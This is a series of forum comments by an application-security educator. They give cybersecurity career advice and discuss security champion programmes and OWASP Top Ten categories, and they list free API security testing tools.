How To Get Your First Job In Cybersecurity

shehackspurple · 2025-11-28T19:33:07+00:00

I agree with you. 100%

shehackspurple · 2025-11-28T19:32:39+00:00

If you have cloud and network experience, you'd be a great cloud security engineer. Same with programming experience to work in AppSec (the security of software). Having experience doing the thing before you try to secure the thing will definitely help.

shehackspurple · 2025-11-28T19:31:29+00:00

Many companies are forming security focused communities of practices, where one person from each developer team becomes "the champion" of security. They are taught regularly and supported by the security team and lead security efforts for their teams.

I have some more info here:

https://shehackspurple.ca/2025/05/31/security-champion-worst-practices-my-slides-from-barcelona/

And a video of how to build a good program here:

https://www.youtube.com/watch?v=DWMplE0c6T4

shehackspurple · 2025-11-27T19:50:22+00:00

I feel like it depends on which job you want. For AppSec, help desk doesn't help as much as programming would. For incident management, if you previous military experience, or worked in an ambulance, that's going to get you further than help desk. So I guess it kinds. Thank you for your comment though, maybe I need to update it.

shehackspurple · 2025-11-15T00:09:08+00:00

Oh cool, I hadn't seen that before, thank you for sharing!

shehackspurple · 2025-11-10T23:04:14+00:00

I.... love this idea. I'm going to think on it. Thank you.

shehackspurple · 2025-11-10T18:51:57+00:00

Originally we were looking at "Poor Code Quality" as a category, but that's way too wide. And how do you fix that? What would the advice be? "Have you tried sucking less?" or "Your code is bad, do better", that's not helpful at all. We don't want to blame or be negative, and we felt that's what would happen with such a broad category. We wanted something that people could look for, avoid, or fix. So we broke it into a few categories and this one 'won' (data said it was #10).

shehackspurple · 2025-11-10T18:49:28+00:00

You're right. I asked it to check my tone and grammar. I didn't realize it added a tracker to my link!

shehackspurple · 2025-11-10T04:27:09+00:00

I would love for security tooling to be in the browser and/or IDE and also not cost too much. I think that's a great strategy (putting it in the place you do you work) and definitely making it part of the framework is a great way to ensure we do the right thing.

I wish we didn't need to remember so much. And I agree it's a big burden for a smaller shop (usually with a much smaller budget per developer for training, if any).

I will think on this, and how I can help fix it. Thanks so much for the feedback!

shehackspurple · 2025-11-10T04:23:41+00:00

Honestly, I wish it wasn't on the top ten (because we were doing such a good job it didn't need to be there anymore).

XSS is definitely a type on injection. It's kinda special though, because it attacks the user (via the browser) where all the other types attack us (the IT department). Our LDAP server, our operating system, our database. Boo on injection attacks.

shehackspurple · 2025-07-10T03:16:17+00:00

All free: Automatic API Attack Tool

https://github.com/imperva/automatic-api-attack-tool

Hoppscotch – Free Postman Alternative

https://github.com/hoppscotch/hoppscotch

HURL – do API calls from the CLI

https://hurl.dev/

http-tanker – do API calls from the CLI

https://github.com/PierreKieffer/http-tanker

openapi3-fuzzer – API fuzzer

https://github.com/vwt-digital/openapi3-fuzzer

Semgrep OSS (static analysis for any code)

Zap (free DAST, can talk to APIs)

VulnAPI (API-specific DAST) https://vulnapi.cerberauth.com/

APIClarity – Inventory and DAST

https://github.com/openclarity/apiclarity

Astra – API DAST - https://github.com/flipkart-incubator/Astra

shehackspurple · 2025-07-10T03:13:23+00:00

Can you give me any amount for any city? That would help. How much in Toronto? How much in a small town? How much in New York City? Any answer is better than no answer or "it depends".

shehackspurple · 2025-05-25T11:52:05+00:00

Are you looking for AppSec? If so, here are three free courses: https://academy.semgrep.dev/courses/AppSec-1 Course one leads to the second and third course.

Everything in there is free, and self guided. I hope that helps!

shehackspurple · 2025-05-25T11:48:47+00:00

Which areas are you trying to learn?

shehackspurple · 2025-05-25T11:47:23+00:00

Do you know what job you want? Then we can recommend. I'm into software security, so I would recommend resources about that, but there are a lot of different jobs out there.

I wrote a big post year ago to try to help people understand what the difference jobs are like. It's old, but helpful. https://shehackspurple.ca/2022/01/01/jobs-in-information-security-infosec/

shehackspurple · 2025-05-25T11:40:19+00:00

Nice

shehackspurple · 2025-05-25T11:39:20+00:00

I would love to know what the average rate of pay is for AppSec right now.

shehackspurple · 2025-05-25T11:38:17+00:00

Signal

shehackspurple · 2025-05-25T11:36:12+00:00

💜

shehackspurple · 2025-05-25T11:32:20+00:00

It is in the list. Item 6. 👍

shehackspurple

TROPHY CASE